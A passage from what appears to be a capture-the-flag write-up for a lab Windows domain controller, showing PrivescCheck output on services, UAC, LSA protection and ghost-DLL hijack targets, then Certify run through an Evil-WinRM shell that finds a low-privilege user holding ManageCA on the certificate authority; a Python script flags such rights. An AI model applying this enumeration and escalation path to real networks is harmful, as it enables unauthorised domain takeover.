StartMode   : Automatic

Name        : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User        : NT AUTHORITY\NETWORKSERVICE
StartMode   : Disabled

Name        : SQLBrowser
DisplayName : SQL Server Browser
ImagePath   : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User        : NT AUTHORITY\LOCALSERVICE
StartMode   : Disabled

Name        : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User        : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode   : Automatic

Name        : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath   : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem3.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic



┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0004 - Privilege Escalation                     
 NAME      Vulnerable Kernel drivers                         
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether known vulnerable kernel drivers are installed. 
 It does so by computing the file hash of each driver and     
 comparing the value against the list provided by             
 loldrivers.io.                                               
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
Warning: Service: MpKsla7af4902 | Path not found: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{4F476386-9BFC-43EC-A5E5-008D5A29EFE0}\MpKslDrv.sys
Warning: Service: vwifibus | Path not found: C:\Windows\System32\drivers\vwifibus.sys
[*] Result: Nothing found

...(omitted)

┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0008 - Lateral Movement                         
 NAME      UAC settings                                      
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether User Access Control (UAC) is enabled and       
 whether it filters the access token of local administrator   
 accounts when they authenticate remotely.                    
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (3 findings)


Key         : HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
Value       : EnableLUA
Data        : 1
Vulnerable  : False
Description : UAC is enabled.

Key         : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value       : LocalAccountTokenFilterPolicy
Data        : (null)
Vulnerable  : False
Description : Only the built-in Administrator account (RID 500) can be granted a high integrity token when authenticating remotely (default).

Key         : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value       : FilterAdministratorToken
Data        : (null)
Vulnerable  : True
Description : The built-in administrator account (RID 500) is granted a high integrity token when authenticating remotely (default).



┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0006 - Credential Access                        
 NAME      LSA Protection                                    
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether LSA protection is enabled. Note that when LSA  
 protection is enabled, 'lsass.exe' runs as a Protected       
 Process Light (PPL) and thus can only be accessed by other   
 protected processes with an equivalent or higher protection  
 level.                                                       
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (1 finding)


Key         : HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Value       : RunAsPPL
Data        : (null)
Description : LSA protection is not enabled.



┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0006 - Credential Access                        
 NAME      Credential Guard                                  
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether Credential Guard is supported and enabled.     
 Note that when Credential Guard is enabled, credentials are  
 stored in an isolated process ('LsaIso.exe') that cannot be  
 accessed, even if the kernel is compromised.                 
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (1 finding)


DeviceGuardSecurityServicesConfigured : (null)
DeviceGuardSecurityServicesRunning    : (null)
Description                           : Credential Guard is not configured. Credential Guard is not running.



┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0003 - Persistence                              
 NAME      UEFI & Secure Boot                                
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether UEFI and Secure Boot are supported and         
 enabled. Note that Secure Boot requires UEFI.                
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (2 findings)

Name        Vulnerable Description
----        ---------- -----------
UEFI             False BIOS mode is UEFI.
Secure Boot       True Secure Boot is not enabled.


┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0008 - Lateral Movement                         
 NAME      LAPS                                              
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether LAPS is configured and enabled. Note that this 
 applies to domain-joined machines only.                      
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Medium (1 finding)


Key         : HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd
Value       : AdmPwdEnabled
Data        : (null)
Description : LAPS is not configured.



┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0001 - Initial Access                           
 NAME      BitLocker configuration                           
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether BitLocker is enabled on the system drive and   
 requires a second factor of authentication (PIN or startup   
 key). Note that this check might yield a false positive if a 
 third-party drive encryption software is installed.          
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Nothing found
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0004 - Privilege Escalation                     
 NAME      PATH folder permissions                           
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether the current user has any write permissions on  
 the system-wide PATH folders. If so, the system could be     
 vulnerable to privilege escalation through ghost DLL         
 hijacking.                                                   
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Nothing found
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0004 - Privilege Escalation                     
 NAME      Known ghost DLLs                                  
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Get information about services that are known to be prone to 
 ghost DLL hijacking. Note that their exploitation requires   
 the current user to have write permissions on at least one   
 system-wide PATH folder.                                     
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Informational (4 findings)


Name           : cdpsgshims.dll
Description    : Loaded by the Connected Devices Platform Service (CDPSvc) upon startup.
RunAs          : NT AUTHORITY\LocalService
RebootRequired : True
Link           : https://nafiez.github.io/security/eop/2019/11/05/windows-service-host-process-eop.html

Name           : WptsExtensions.dll
Description    : Loaded by the Task Scheduler service (Schedule) upon startup.
RunAs          : LocalSystem
RebootRequired : True
Link           : http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html

Name           : SprintCSP.dll
Description    : Loaded by the Storage Service (StorSvc) when the RPC procedure 'SvcRebootToFlashingMode' is invoked.
RunAs          : LocalSystem
RebootRequired : False
Link           : https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc

Name           : wlanapi.dll
Description    : Loaded by the Network Connections service (NetMan) when listing network interfaces.
RunAs          : LocalSystem
RebootRequired : False
Link           : https://itm4n.github.io/windows-server-netman-dll-hijacking/



...(omitted)

┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0004 - Privilege Escalation                     
 NAME      Driver co-installers                              
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether Driver Co-installers are disabled. A local     
 user might be able to gain SYSTEM privileges by plugging in  
 a device such as a mouse or keyboard with a vulnerable       
 Driver Co-installer.                                         
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (1 finding)


Key         : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer
Value       : DisableCoInstallers
Data        : (null)
Description : Driver Co-installers are not disabled (default).




┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
                 ~~~ PrivescCheck Summary ~~~                 
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
 TA0003 - Persistence
 - UEFI & Secure Boot      Low      (2 findings)
 TA0004 - Privilege Escalation
 - Driver co-installers    Low      (1 finding)
 TA0006 - Credential Access
 - Credential Guard        Low      (1 finding)
 - LSA Protection          Low      (1 finding)
 TA0008 - Lateral Movement
 - LAPS                    Medium   (1 finding)
 - UAC settings            Low      (3 findings)

Warning: To get more info, run this script with the option '-Extended'.

I could try some of these, but certsrv is still the thing that stands out.
Let me double-check it with ps as well.
[6.png: screenshot of the ps output]
There it is!

Certify

Use Certify to check for vulnerable certificate templates.
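The part of the Certify output below that matters most is the "CA Permissions" block, not the templates. As an added example (my own code, not part of this write-up or of the Certify project), the script parses that block as Certify prints it and flags any Allow entry that grants ManageCA or ManageCertificates to a principal outside BUILTIN\Administrators, Domain Admins and Enterprise Admins; either right makes its holder a CA administrator or officer, which is the CA-level misconfiguration known as ESC7. The sample input is the CA Permissions block copied from the output below; the expected-admin SID list is my assumption.

```python
"""Flag CA-level ACL misconfigurations in Certify 'find' output.

Added example, not part of the original write-up or of Certify itself. It
reads the 'CA Permissions' block that Certify prints and reports Allow entries
that grant ManageCA or ManageCertificates to principals that are not one of
the expected administrative groups.
"""
import re
from dataclasses import dataclass

# Rights that make the holder a CA administrator (ManageCA) or CA officer
# (ManageCertificates, i.e. approving pending requests).
CA_ADMIN_RIGHTS = {"ManageCA", "ManageCertificates"}

# Principals expected to hold those rights (assumption: adjust per environment).
EXPECTED_SIDS = {"S-1-5-32-544"}   # BUILTIN\Administrators
EXPECTED_RIDS = {"512", "519"}     # Domain Admins, Enterprise Admins

# One ACE line: '<Allow|Deny>  <rights>  <principal><spaces?><SID>'.
# Certify sometimes prints the SID glued to the principal with no separator
# ('NT AUTHORITY\Authenticated UsersS-1-5-11'), so the SID is located by its
# 'S-1-' prefix rather than by whitespace.
ACE_RE = re.compile(r"^\s*(Allow|Deny)\s+(.+?)\s{2,}(.+?)\s*(S-1-\d+(?:-\d+)*)\s*$")


@dataclass(frozen=True)
class Ace:
    kind: str            # 'Allow' or 'Deny'
    rights: frozenset    # e.g. {'ManageCA', 'Enroll'}
    principal: str
    sid: str


def parse_ca_permissions(text):
    """Return the ACEs listed under 'CA Permissions' in Certify output."""
    aces, in_block = [], False
    for line in text.splitlines():
        if "CA Permissions" in line:
            in_block = True
            continue
        if in_block and "Enrollment Agent Restrictions" in line:
            break  # end of the CA Permissions block
        m = ACE_RE.match(line) if in_block else None
        if m:
            kind, rights, principal, sid = m.groups()
            rights = frozenset(r.strip() for r in rights.split(","))
            aces.append(Ace(kind, rights, principal.strip(), sid))
    return aces


def is_expected_admin(sid):
    """True for BUILTIN\\Administrators or a domain SID ending in RID 512/519."""
    if sid in EXPECTED_SIDS:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in EXPECTED_RIDS


def find_ca_misconfigs(text):
    """(principal, sid, rights) for non-admin principals holding CA admin rights."""
    findings = []
    for ace in parse_ca_permissions(text):
        if ace.kind != "Allow":      # Deny ACEs only take rights away
            continue
        dangerous = sorted(ace.rights & CA_ADMIN_RIGHTS)
        if dangerous and not is_expected_admin(ace.sid):
            findings.append((ace.principal, ace.sid, dangerous))
    return findings


# Constructed sample: the 'CA Permissions' block exactly as Certify printed it
# on this box (copied from the write-up's output).
SAMPLE = r"""
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Deny   ManageCA, Read                             MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Allow  ManageCA, Enroll                           MANAGER\Raven                 S-1-5-21-4078382237-1492182817-2568127209-1116
      Allow  Enroll                                     MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
    Enrollment Agent Restrictions : None
"""

if __name__ == "__main__":
    for principal, sid, rights in find_ca_misconfigs(SAMPLE):
        print(f"[!] {principal} ({sid}) holds {', '.join(rights)} on the CA")
```

Run it against a saved `Certify.exe find` transcript by reading the file into `find_ca_misconfigs`; on this output the only hit is MANAGER\Raven with ManageCA.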

*Evil-WinRM* PS C:\Users\Raven\Documents> ./Certify.exe find /vulnarable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ |__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=manager,DC=htb'

[*] Listing info about the Enterprise CA 'manager-DC01-CA'

    Enterprise CA Name            : manager-DC01-CA
    DNS Hostname                  : dc01.manager.htb
    FullName                      : dc01.manager.htb\manager-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=manager-DC01-CA, DC=manager, DC=htb
    Cert Thumbprint               : ACE850A2892B1614526F7F2151EE76E752415023
    Cert Serial                   : 5150CE6EC048749448C7390A52F264BB
    Cert Start Date               : 7/27/2023 3:21:05 AM
    Cert End Date                 : 7/27/2122 3:31:04 AM
    Cert Chain                    : CN=manager-DC01-CA,DC=manager,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Deny   ManageCA, Read                             MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Allow  ManageCA, Enroll                           MANAGER\Raven                 S-1-5-21-4078382237-1492182817-2568127209-1116
      Allow  Enroll                                     MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
    Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : User
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Domain Users          S-1-5-21-4078382237-1492182817-2568127209-513
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : EFS
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Encrypting File System
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Domain Users          S-1-5-21-4078382237-1492182817-2568127209-513
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : Administrator
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : EFSRecovery
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : File Recovery
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Domain Computers      S-1-5-21-4078382237-1492182817-2568127209-515
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : DomainController
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Domain Controllers    S-1-5-21-4078382237-1492182817-2568127209-516
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
                                      MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : WebServer
    Schema Version                        : 1
    Validity Period                       : 2 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : SubCA
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : <null>
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteOwner Principals       : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
                                      MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519

    CA Name                               : dc01.manager.htb\manager-DC01-CA
    Template Name                         : DomainControllerAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
